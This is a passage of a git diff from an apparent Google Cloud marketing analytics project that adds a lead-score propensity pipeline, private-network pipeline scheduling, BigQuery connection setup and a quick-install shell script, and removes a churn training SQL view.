a/python/pipelines/components/bigquery/component.py b/python/pipelines/components/bigquery/component.py index c4aa542f..e52a511e 100644 --- a/python/pipelines/components/bigquery/component.py +++ b/python/pipelines/components/bigquery/component.py @@ -879,7 +879,7 @@ def bq_dynamic_query_exec_output( # Construct query template template = jinja2.Template(""" CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.{{create_table}}` AS ( - SELECT + SELECT DISTINCT feature, ROUND(100 * SUM(users) OVER (ORDER BY users DESC) / SUM(users) OVER (), 2) as cumulative_traffic_percent, @@ -892,7 +892,7 @@ def bq_dynamic_query_exec_output( SELECT user_pseudo_id, user_id, - page_location as page_path + LOWER(page_location) as page_path FROM `{{mds_project_id}}.{{mds_dataset}}.event` WHERE event_name = 'page_view' @@ -1423,4 +1423,4 @@ def execute_query_with_retries(query): logging.error(f"Query failed after retries: {e}") - \ No newline at end of file + diff --git a/python/pipelines/feature_engineering_pipelines.py b/python/pipelines/feature_engineering_pipelines.py index deb7b88b..a15ffa12 100644 --- a/python/pipelines/feature_engineering_pipelines.py +++ b/python/pipelines/feature_engineering_pipelines.py @@ -196,8 +196,73 @@ def audience_segmentation_feature_engineering_pipeline( location=location, query=query_audience_segmentation_inference_preparation, timeout=timeout).set_display_name('audience_segmentation_inference_preparation').after(*phase_1) - - + + +@dsl.pipeline() +def lead_score_propensity_feature_engineering_pipeline( + project_id: str, + location: Optional[str], + query_lead_score_propensity_label: str, + query_user_dimensions: str, + query_user_rolling_window_metrics: str, + query_lead_score_propensity_inference_preparation: str, + query_lead_score_propensity_training_preparation: str, + timeout: Optional[float] = 3600.0 +): + """ + This pipeline defines the steps for feature engineering for the lead score propensity model. + + Args: + project_id: The Google Cloud project ID. + location: The Google Cloud region where the pipeline will be run. + query_lead_score_propensity_label: The SQL query that will be used to calculate the purchase propensity label. + query_user_dimensions: The SQL query that will be used to calculate the user dimensions. + query_user_rolling_window_metrics: The SQL query that will be used to calculate the user rolling window metrics. + query_lead_score_propensity_inference_preparation: The SQL query that will be used to prepare the inference data. + query_lead_score_propensity_training_preparation: The SQL query that will be used to prepare the training data. + timeout: The timeout for the pipeline in seconds. + + Returns: + None + """ + + # Features Preparation + phase_1 = list() + phase_1.append( + sp( + project=project_id, + location=location, + query=query_lead_score_propensity_label, + timeout=timeout).set_display_name('lead_score_propensity_label') + ) + phase_1.append( + sp( + project=project_id, + location=location, + query=query_user_dimensions, + timeout=timeout).set_display_name('user_dimensions') + ) + phase_1.append( + sp( + project=project_id, + location=location, + query=query_user_rolling_window_metrics, + timeout=timeout).set_display_name('user_rolling_window_metrics') + ) + # Training data preparation + purchase_propensity_train_prep = sp( + project=project_id, + location=location, + query=query_lead_score_propensity_training_preparation, + timeout=timeout).set_display_name('lead_score_propensity_training_preparation').after(*phase_1) + # Inference data preparation + purchase_propensity_inf_prep = sp( + project=project_id, + location=location, + query=query_lead_score_propensity_inference_preparation, + timeout=timeout).set_display_name('lead_score_propensity_inference_preparation').after(*phase_1) + + @dsl.pipeline() def purchase_propensity_feature_engineering_pipeline( project_id: str, diff --git a/python/pipelines/pipeline_ops.py b/python/pipelines/pipeline_ops.py index a1b94675..abb15659 100644 --- a/python/pipelines/pipeline_ops.py +++ b/python/pipelines/pipeline_ops.py @@ -17,6 +17,7 @@ from tracemalloc import start import pip +from sympy import preview from kfp import compiler from google.cloud.aiplatform.pipeline_jobs import PipelineJob, _set_enable_caching_value from google.cloud.aiplatform import TabularDataset, Artifact @@ -625,6 +626,30 @@ def get_gcp_bearer_token() -> str: return bearer_token +def _get_project_number(project_id) -> str: + """ + Retrieves the project number from a project id + + Returns: + A string containing the project number + + Raises: + Exception: If an error occurs while retrieving the resource manager project object. + """ + from google.cloud import resourcemanager_v3 + + # Create a resource manager client + client = resourcemanager_v3.ProjectsClient() + + # Get the project number + project = client.get_project(name=f"projects/{project_id}").name + project_number = project.split('/')[-1] + + logging.info(f"Project Number: {project_number}") + + return project_number + + # Function to schedule the pipeline. def schedule_pipeline( project_id: str, @@ -636,7 +661,9 @@ def schedule_pipeline( cron: str, max_concurrent_run_count: str, start_time: str, - end_time: str, + end_time: str = None, + subnetwork: str = "default", + use_private_service_access: bool = False, pipeline_parameters: Dict[str, Any] = None, pipeline_parameters_substitutions: Optional[Dict[str, Any]] = None, ) -> dict: @@ -654,6 +681,8 @@ def schedule_pipeline( max_concurrent_run_count: The maximum number of concurrent pipeline runs. start_time: The start time of the schedule. end_time: The end time of the schedule. + subnetwork: The VPC subnetwork name to be used in VPC peering. + use_private_service_access: A flag to define whether to use the VPC private service access or not. Returns: A dictionary containing information about the scheduled pipeline. @@ -676,19 +705,53 @@ def schedule_pipeline( pipeline_job = aiplatform.PipelineJob( template_path=template_path, pipeline_root=pipeline_root, + location=region, display_name=f"{pipeline_name}", ) - # Create the schedule with the pipeline job defined - pipeline_job_schedule = pipeline_job.create_schedule( + # https://cloud.google.com/python/docs/reference/aiplatform/latest/google.cloud.aiplatform.PipelineJobSchedule + # Create a schedule for the pipeline job + pipeline_job_schedule = aiplatform.PipelineJobSchedule( display_name=f"{pipeline_name}", - cron=cron, - max_concurrent_run_count=max_concurrent_run_count, - start_time=start_time, - end_time=end_time, - service_account=pipeline_sa, + pipeline_job=pipeline_job, + location=region ) + # Get the project number to use in the network identifier + project_number = _get_project_number(project_id) + + # Create the schedule using the pipeline job schedule + # Using the VPC private service access or not, depending on the flag + if use_private_service_access: + pipeline_job_schedule.create( + cron=cron, + max_concurrent_run_count=max_concurrent_run_count, + start_time=start_time, + end_time=end_time, + service_account=pipeline_sa, + network=f"projects/{project_number}/global/networks/{subnetwork}", + create_request_timeout=None, + ) + else: + pipeline_job_schedule.create( + cron=cron, + max_concurrent_run_count=max_concurrent_run_count, + start_time=start_time, + end_time=end_time, + service_account=pipeline_sa, + create_request_timeout=None, + ) + + # Old version - Create the schedule with the pipeline job defined + #pipeline_job_schedule = pipeline_job.create_schedule( + # display_name=f"{pipeline_name}", + # cron=cron, + # max_concurrent_run_count=max_concurrent_run_count, + # start_time=start_time, + # end_time=end_time, + # service_account=pipeline_sa, + #) + logging.info(f"Pipeline scheduled : {pipeline_name}") return pipeline_job @@ -903,4 +966,4 @@ def run_pipeline( if (pl.has_failed): raise RuntimeError("Pipeline execution failed") return pl - \ No newline at end of file + diff --git a/python/pipelines/scheduler.py b/python/pipelines/scheduler.py index fbdd9933..7e00dc8e 100644 --- a/python/pipelines/scheduler.py +++ b/python/pipelines/scheduler.py @@ -37,8 +37,11 @@ def check_extention(file_path: str, type: str = '.yaml'): 'vertex_ai.pipelines.feature-creation-purchase-propensity.execution': "pipelines.feature_engineering_pipelines.purchase_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.feature-creation-churn-propensity.execution': "pipelines.feature_engineering_pipelines.churn_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.feature-creation-customer-ltv.execution': "pipelines.feature_engineering_pipelines.customer_lifetime_value_feature_engineering_pipeline", + 'vertex_ai.pipelines.feature-creation-lead-score-propensity.execution': "pipelines.feature_engineering_pipelines.lead_score_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.purchase_propensity.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.purchase_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", + 'vertex_ai.pipelines.lead_score_propensity.training': None, # tabular workflows pipelines is precompiled + 'vertex_ai.pipelines.lead_score_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", 'vertex_ai.pipelines.churn_propensity.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.churn_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", 'vertex_ai.pipelines.segmentation.training': "pipelines.segmentation_pipelines.training_pl", @@ -138,7 +141,9 @@ def check_extention(file_path: str, type: str = '.yaml'): cron=my_pipeline_vars['schedule']['cron'], max_concurrent_run_count=my_pipeline_vars['schedule']['max_concurrent_run_count'], start_time=my_pipeline_vars['schedule']['start_time'], - end_time=my_pipeline_vars['schedule']['end_time'] + end_time=my_pipeline_vars['schedule']['end_time'], + subnetwork=my_pipeline_vars['schedule']['subnetwork'], + use_private_service_access=my_pipeline_vars['schedule']['use_private_service_access'], ) if my_pipeline_vars['schedule']['state'] == 'PAUSED': diff --git a/python/pipelines/transformations-lead-score-propensity.json b/python/pipelines/transformations-lead-score-propensity.json new file mode 100644 index 00000000..28ca5e70 --- /dev/null +++ b/python/pipelines/transformations-lead-score-propensity.json @@ -0,0 +1,368 @@ +[ + { + "numeric": { + "column_name": "user_ltv_revenue", + "invalid_values_allowed": true + } + }, + { + "categorical": { + "column_name": "device_category" + } + }, + { + "categorical": { + "column_name": "device_mobile_brand_name" + } + }, + { + "categorical": { + "column_name": "device_mobile_model_name" + } + }, + { + "categorical": { + "column_name": "device_os" + } + }, + { + "categorical": { + "column_name": "device_language" + } + }, + { + "categorical": { + "column_name": "device_web_browser" + } + }, + { + "categorical": { + "column_name": "geo_sub_continent" + } + }, + { + "categorical": { + "column_name": "geo_country" + } + }, + { + "categorical": { + "column_name": "geo_region" + } + }, + { + "categorical": { + "column_name": "geo_city" + } + }, + { + "categorical": { + "column_name": "geo_metro" + } + }, + { + "categorical": { + "column_name": "last_traffic_source_medium" + } + }, + { + "categorical": { + "column_name": "last_traffic_source_name" + } + }, + { + "categorical": { + "column_name": "last_traffic_source_source" + } + }, + { + "categorical": { + "column_name": "first_traffic_source_medium" + } + }, + { + "categorical": { + "column_name": "first_traffic_source_name" + } + }, + { + "categorical": { + "column_name": "first_traffic_source_source" + } + }, + { + "categorical": { + "column_name": "has_signed_in_with_user_id" + } + }, + { + "numeric": { + "column_name": "scroll_50_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_50_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_50_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_50_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_50_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_5_day", + "invalid_values_allowed": true + } + } +] \ No newline at end of file diff --git a/scripts/common.sh b/scripts/common.sh index 926eec7f..142fbbc1 100644 --- a/scripts/common.sh +++ b/scripts/common.sh @@ -46,8 +46,43 @@ declare -a apis_array=("cloudresourcemanager.googleapis.com" "bigquerymigration.googleapis.com" "bigquerydatatransfer.googleapis.com" "dataform.googleapis.com" + "cloudkms.googleapis.com" + "servicenetworking.googleapis.com" + "artifactregistry.googleapis.com" + "cloudbuild.googleapis.com" + "aiplatform.googleapis.com" + "storage-api.googleapis.com" + "bigqueryconnection.googleapis.com" ) +create_bigquery_connection() { + _PROJECT_ID=$1 + _LOCATION=$2 + _CONNECTION_TYPE='CLOUD_RESOURCE' + _CONNECTION_NAME=$3 + + CONNECTION_EXISTS=$(bq ls --connection --location=$_LOCATION --project_id=$_PROJECT_ID) + if [ "$CONNECTION_EXISTS" = "No connections found." ]; then + bq mk --connection --location=$_LOCATION --project_id=$_PROJECT_ID --connection_type=$_CONNECTION_TYPE $_CONNECTION_NAME + + SERVICE_ACCT_EMAIL=$(bq show --format=prettyjson --connection $_LOCATION.$_CONNECTION_NAME | grep "serviceAccountId" | cut -d '"' -f 4 | cut -d '?' -f 1) + echo $SERVICE_ACCT_EMAIL + + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/serviceusage.serviceUsageConsumer" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/bigquery.connectionUser" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/bigquery.connectionAdmin" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/aiplatform.user" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/bigquery.jobUser" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/bigquery.dataEditor" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/storage.admin" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/storage.objectViewer" + return 0 + else + echo "BQ Connection already exists: $CONNECTION_EXISTS" + return 0 + fi +} + get_project_id() { local __resultvar=$1 VALUE=$(gcloud config get-value project | xargs) diff --git a/scripts/generate-tf-backend.sh b/scripts/generate-tf-backend.sh index 5a1178fc..481a0885 100755 --- a/scripts/generate-tf-backend.sh +++ b/scripts/generate-tf-backend.sh @@ -19,15 +19,15 @@ set -o nounset . scripts/common.sh -section_open "Check if the necessary dependencies are available: gcloud, gsutil, terraform, poetry" +section_open "Check if the necessary dependencies are available: gcloud, gsutil, terraform, uv" check_exec_dependency "gcloud" check_exec_version "gcloud" check_exec_dependency "gsutil" check_exec_version "gsutil" check_exec_dependency "terraform" check_exec_version "terraform" - check_exec_dependency "poetry" - check_exec_version "poetry" + check_exec_dependency "uv" + check_exec_version "uv" section_close section_open "Check if the necessary variables are set: PROJECT_ID" @@ -51,10 +51,6 @@ section_open "Enable all the required APIs" enable_all_apis section_close -section_open "Install poetry libraries in the virtual environment for Terraform" - poetry install -section_close - section_open "Creating a new Google Cloud Storage bucket to store the Terraform state in ${TF_STATE_PROJECT} project, bucket: ${TF_STATE_BUCKET}" if gsutil ls -b gs://"${TF_STATE_BUCKET}" >/dev/null 2>&1; then printf "The ${TF_STATE_BUCKET} Google Cloud Storage bucket already exists. \n" @@ -69,6 +65,11 @@ section_open "Creating terraform backend.tf configuration file" create_terraform_backend_config_file "${TERRAFORM_RUN_DIR}" "${TF_STATE_BUCKET}" section_close +section_open "Creating BigQuery and Vertex AI connection" + create_bigquery_connection "${PROJECT_ID}" "${LOCATION}" "vertex_ai_conn" + create_bigquery_connection "${PROJECT_ID}" "US" "vertex_ai_conn" +section_close + printf "$DIVIDER" printf "You got the end the of your generate-tf-backend script with everything working. \n" printf "$DIVIDER" diff --git a/scripts/quick-install.sh b/scripts/quick-install.sh new file mode 100755 index 00000000..57d0ed2c --- /dev/null +++ b/scripts/quick-install.sh @@ -0,0 +1,137 @@ +#!/usr/bin/env sh + +# Copyright 2023 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -o errexit +set -o nounset +#set -x + +. scripts/common.sh + +section_open "Setting the gcloud project id" + # Ask user to input the project id + echo "Input the GCP Project Id where you want to deploy Marketing Analytics Jumpstart:" + read TF_STATE_PROJECT_ID + # Set the project id to the environment variable + export TF_STATE_PROJECT_ID + # Set the project id to the environment variable + export GOOGLE_CLOUD_PROJECT=${TF_STATE_PROJECT_ID} + # Set the project id to the environment variable + export GOOGLE_CLOUD_QUOTA_PROJECT=$GOOGLE_CLOUD_PROJECT + # Set the project id to the environment variable + export PROJECT_ID=$GOOGLE_CLOUD_PROJECT + # Disable prompts + gcloud config set disable_prompts true + # Set the project id to the gcloud configuration + gcloud config set project "${TF_STATE_PROJECT_ID}" +section_close + +section_open "Enable all the required APIs" + enable_all_apis +section_close + +section_open "Authenticate to Google Cloud Project" + gcloud auth login --project "${TF_STATE_PROJECT_ID}" + echo "Close the browser tab that was open and press any key to continue.." + read moveon +section_close + +section_open "Setting Google Application Default Credentials" + gcloud config set disable_prompts false + gcloud auth application-default login --quiet --scopes="openid,https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/analytics,https://www.googleapis.com/auth/analytics.edit,https://www.googleapis.com/auth/analytics.provision,https://www.googleapis.com/auth/analytics.readonly,https://www.googleapis.com/auth/accounts.reauth" + echo "Close the browser tab that was open and press any key to continue.." + read moveon + CREDENTIAL_FILE=`gcloud auth application-default set-quota-project "${PROJECT_ID}" 2>&1 | grep -e "Credentials saved to file:" | cut -d "[" -f2 | cut -d "]" -f1` + export GOOGLE_APPLICATION_CREDENTIALS=${CREDENTIAL_FILE} +section_close + +section_open "Check OS system" + unameOut="$(uname -s)" + case "${unameOut}" in + Linux*) machine=Linux;; + Darwin*) machine=Mac;; + CYGWIN*) machine=Cygwin;; + MINGW*) machine=MinGw;; + MSYS_NT*) machine=Git;; + *) machine="UNKNOWN:${unameOut}" + esac + echo ${machine} +section_close + +section_open "Configuring environment" + SOURCE_ROOT=$(pwd) + cd ${SOURCE_ROOT} + + # Install python3.10 + sudo chown -R ctimoteo /usr/local/sbin + chmod u+w /usr/local/sbin + if [ $machine == "Linux" ]; then + sudo DEBIAN_FRONTEND=noninteractive apt-get -qq -o=Dpkg::Use-Pty=0 install python3.10 --assume-yes + elif [ $machine == "Darwin" ]; then + brew install python@3.10 + fi + CLOUDSDK_PYTHON=python3.10 + + # Install pipx + if [ $machine == "Linux" ]; then + sudo apt update + sudo apt install pipx + elif [ $machine == "Darwin" ]; then + brew install pipx + fi + pipx ensurepath + + #pip3 install poetry + pipx install poetry + export PATH="$HOME/.local/bin:$PATH" + poetry env use python3.10 + poetry --version + + # Install tfenv + if [ ! -d ~/.tfenv ]; then + git clone --depth=1 https://github.com/tfutils/tfenv.git ~/.tfenv + echo 'export PATH="$HOME/.tfenv/bin:$PATH"' >> ~/.bash_profile + echo 'export PATH=$PATH:$HOME/.tfenv/bin' >> ~/.bashrc + fi + export PATH="$PATH:$HOME/.tfenv/bin" + + # Install terraform version + tfenv install 1.5.7 + tfenv use 1.5.7 + terraform --version + + # Generate TF backend + . scripts/generate-tf-backend.sh +section_close + +section_open "Preparing Terraform Environment File" + TERRAFORM_RUN_DIR=${SOURCE_ROOT}/infrastructure/terraform + if [ ! -f $TERRAFORM_RUN_DIR/terraform.tfvars ]; then + . scripts/set-env.sh + sudo apt-get -qq -o=Dpkg::Use-Pty=0 install gettext + envsubst < "${SOURCE_ROOT}/infrastructure/cloudshell/terraform-template.tfvars" > "${TERRAFORM_RUN_DIR}/terraform.tfvars" + fi +section_close + +section_open "Deploying Terraform Infrastructure Resources" + export PATH="$HOME/.local/bin:$PATH" + export PATH="$PATH:$HOME/.tfenv/bin" + terraform -chdir="${TERRAFORM_RUN_DIR}" init + terraform -chdir="${TERRAFORM_RUN_DIR}" apply +section_close + +#set +x +set +o nounset +set +o errexit diff --git a/sql/procedure/churn_propensity_training_preparation.sqlx b/sql/procedure/churn_propensity_training_preparation.sqlx index 32056b62..36a8f657 100644 --- a/sql/procedure/churn_propensity_training_preparation.sqlx +++ b/sql/procedure/churn_propensity_training_preparation.sqlx @@ -849,189 +849,6 @@ WHERE MOD(row_order_peruser_persplit-1, 30) = 0; - CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_churn_propensity_training_30_30_balanced` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - churned) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_churn_propensity_training_30_30_balanced", - description="View Churn Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS - SELECT DISTINCT - processed_timestamp, -- The timestamp the row was processed. - data_split, -- The data split (train, validation, test) for the user. - user_pseudo_id, -- The unique identifier for the user. - user_id, -- The user ID. - user_ltv_revenue, -- The lifetime value revenue for the user. - device_category, -- The category of the device used by the user. - device_mobile_brand_name, -- The brand name of the mobile device used by the user. - device_mobile_model_name, -- The model name of the mobile device used by the user. - device_os, -- The operating system of the device used by the user. - device_language, -- The language used by the user. - device_web_browser, -- The web browser used by the user. - geo_sub_continent, -- The sub-continent of the user's location. - geo_country, -- The country of the user's location. - geo_region, -- The region of the user's location. - geo_city, -- The city of the user's location. - geo_metro, -- The metropolitan area of the user's location. - last_traffic_source_medium, -- The medium used to reach the user's last session. - last_traffic_source_name, -- The name of the traffic source used to reach the user's last session. - last_traffic_source_source, -- The source of the last traffic source used by the user. - first_traffic_source_medium, -- The medium of the first traffic source used by the user. - first_traffic_source_name, -- The name of the first traffic source used by the user. - first_traffic_source_source, -- The source of the first traffic source used by the user. - has_signed_in_with_user_id, -- Whether the user has signed in with a user ID. - active_users_past_1_day, -- The number of active users in the past 1 day for each user. - active_users_past_2_day, -- The number of active users in the past 2 days for each user. - active_users_past_3_day, -- The number of active users in the past 3 days for each user. - active_users_past_4_day, -- The number of active users in the past 4 days for each user. - active_users_past_5_day, -- The number of active users in the past 5 days for each user. - active_users_past_6_day, -- The number of active users in the past 6 days for each user. - active_users_past_7_day, -- The number of active users in the past 7 days for each user. - active_users_past_8_14_day, -- The number of active users in the past 8-14 days for each user. - active_users_past_15_30_day, -- The number of active users in the past 15-30 days for each user. - purchases_past_1_day, -- The number of purchases in the past 1 day for each user. - purchases_past_2_day, -- The number of purchases in the past 2 days for each user. - purchases_past_3_day, -- The number of purchases in the past 3 days for each user. - purchases_past_4_day, -- The number of purchases in the past 4 days for each user. - purchases_past_5_day, -- The number of purchases in the past 5 days for each user. - purchases_past_6_day, -- The number of purchases in the past 6 days for each user. - purchases_past_7_day, -- The number of purchases in the past 7 days for each user. - purchases_past_8_14_day, -- The number of purchases in the past 8-14 days for each user. - purchases_past_15_30_day, -- The number of purchases in the past 15-30 days for each user. - visits_past_1_day, -- The number of visits in the past 1 day for each user. - visits_past_2_day, -- The number of visits in the past 2 days for each user. - visits_past_3_day, -- The number of visits in the past 3 days for each user. - visits_past_4_day, -- The number of visits in the past 4 days for each user. - visits_past_5_day, -- The number of visits in the past 5 days for each user. - visits_past_6_day, -- The number of visits in the past 6 days for each user. - visits_past_7_day, -- The number of visits in the past 7 days for each user. - visits_past_8_14_day, -- The number of visits in the past 8-14 days for each user. - visits_past_15_30_day, -- The number of visits in the past 15-30 days for each user. - view_items_past_1_day, -- The number of items viewed in the past 1 day for each user. - view_items_past_2_day, -- The number of items viewed in the past 2 days for each user. - view_items_past_3_day, -- The number of items viewed in the past 3 days for each user. - view_items_past_4_day, -- The number of items viewed in the past 4 days for each user. - view_items_past_5_day, -- The number of items viewed in the past 5 days for each user. - view_items_past_6_day, -- The number of items viewed in the past 6 days for each user. - view_items_past_7_day, -- The number of items viewed in the past 7 days for each user. - view_items_past_8_14_day, -- The number of items viewed in the past 8-14 days for each user. - view_items_past_15_30_day, -- The number of items viewed in the past 15-30 days for each user. - add_to_carts_past_1_day, -- The number of items added to carts in the past 1 day for each user. - add_to_carts_past_2_day, -- The number of items added to carts in the past 2 days for each user. - add_to_carts_past_3_day, -- The number of items added to carts in the past 3 days for each user. - add_to_carts_past_4_day, -- The number of items added to carts in the past 4 days for each user. - add_to_carts_past_5_day, -- The number of items added to carts in the past 5 days for each user. - add_to_carts_past_6_day, -- The number of items added to carts in the past 6 days for each user. - add_to_carts_past_7_day, -- The number of items added to carts in the past 7 days for each user. - add_to_carts_past_8_14_day, -- The number of items added to carts in the past 8-14 days for each user. - add_to_carts_past_15_30_day, -- The number of items added to carts in the past 15-30 days for each user. - checkouts_past_1_day, -- The number of checkouts in the past 1 day for each user. - checkouts_past_2_day, -- The number of checkouts in the past 2 days for each user. - checkouts_past_3_day, -- The number of checkouts in the past 3 days for each user. - checkouts_past_4_day, -- The number of checkouts in the past 4 days for each user. - checkouts_past_5_day, -- The number of checkouts in the past 5 days for each user. - checkouts_past_6_day, -- The number of checkouts in the past 6 days for each user. - checkouts_past_7_day, -- The number of checkouts in the past 7 days for each user. - checkouts_past_8_14_day, -- The number of checkouts in the past 8-14 days for each user. - checkouts_past_15_30_day, -- The number of checkouts in the past 15-30 days for each user. - churned -- Whether the user churned. - FROM ( - SELECT - DISTINCT 